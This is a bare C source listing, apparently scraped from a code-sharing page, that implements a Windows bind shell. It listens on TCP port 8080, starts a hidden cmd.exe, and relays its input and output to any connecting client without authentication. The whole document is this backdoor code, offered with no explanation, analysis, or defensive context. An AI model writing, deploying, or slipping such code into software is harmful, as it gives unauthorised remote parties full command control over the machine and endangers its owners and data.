1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111
| #include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define USE_MINIMAL_SIZE
#define PORT 8080
#define BUFSIZE 8192
#define SLEEP_TIME 500
void main(int argc, char* argv[])
{
register int numbytes;
int socklen;
char *membuf;
SECURITY_ATTRIBUTES security_attributes;
STARTUPINFO startup_info;
HANDLE StdOutputRead, StdOutputWrite, StdInputRead, StdInputWrite;
WSADATA wsaData;
SOCKET serverfd = INVALID_SOCKET, clientfd = INVALID_SOCKET;
SOCKADDR_IN serversin, clientsin;
WSAStartup(MAKEWORD(1, 1), &wsaData);
membuf = (char *)GlobalAlloc(GMEM_FIXED | GMEM_ZEROINIT, BUFSIZE);
serverfd = WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
memset(&serversin, 0, sizeof(serversin));
serversin.sin_family = AF_INET;
serversin.sin_port = htons(PORT);
int val = 1;
setsockopt(serverfd, SOL_SOCKET, SO_REUSEADDR, (const char *)&val, sizeof(val));
bind(serverfd, (LPSOCKADDR)&serversin, sizeof(serversin));
listen(serverfd, 0);
security_attributes.nLength = sizeof(SECURITY_ATTRIBUTES);
security_attributes.bInheritHandle = true;
security_attributes.lpSecurityDescriptor = NULL;
start_server:
CreatePipe(&StdOutputRead, &StdOutputWrite, &security_attributes, 0);
CreatePipe(&StdInputRead, &StdInputWrite, &security_attributes, 0);
GetStartupInfo(&startup_info);
startup_info.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
startup_info.wShowWindow = SW_HIDE;
startup_info.hStdOutput = startup_info.hStdError = StdOutputWrite;
startup_info.hStdInput = StdInputRead;
CreateProcess(NULL, "cmd", NULL, NULL, true, 0, NULL, NULL, &startup_info, (PROCESS_INFORMATION *)&startup_info);
CloseHandle(StdOutputWrite);
CloseHandle(StdInputRead);
accept_new_client:
socklen = sizeof(clientsin);
clientfd = accept(serverfd, (LPSOCKADDR)&clientsin, &socklen);
get_cmd_data:
Sleep(500);
if (!PeekNamedPipe(StdOutputRead, NULL, 0, NULL, (DWORD *)&numbytes, 0)) goto accept_new_client;
if (numbytes == 0) goto get_client_data;
if (!ReadFile(StdOutputRead, membuf, BUFSIZE, (DWORD *)&numbytes, NULL)) goto accept_new_client;
if (send(clientfd, membuf, numbytes, 0) <= 0)
{
#ifdef USE_MINIMAL_SIZE
goto start_server;
#else
goto close_server;
#endif
}
goto get_client_data;
get_client_data:
numbytes = recv(clientfd, membuf, BUFSIZE, 0);
if (numbytes <= 0)
{
#ifdef USE_MINIMAL_SIZE
goto start_server;
#else
goto close_server;
#endif
}
if (!WriteFile(StdInputWrite, membuf, numbytes, (DWORD *)&numbytes, NULL))
{
#ifdef USE_MINIMAL_SIZE
goto start_server;
#else
goto close_server;
#endif
}
goto get_cmd_data;
#ifndef USE_MINIMAL_SIZE
close_server:
closesocket(clientfd);
CloseHandle(StdInputWrite);
CloseHandle(StdOutputRead);
goto start_server;
#endif
} |
Partager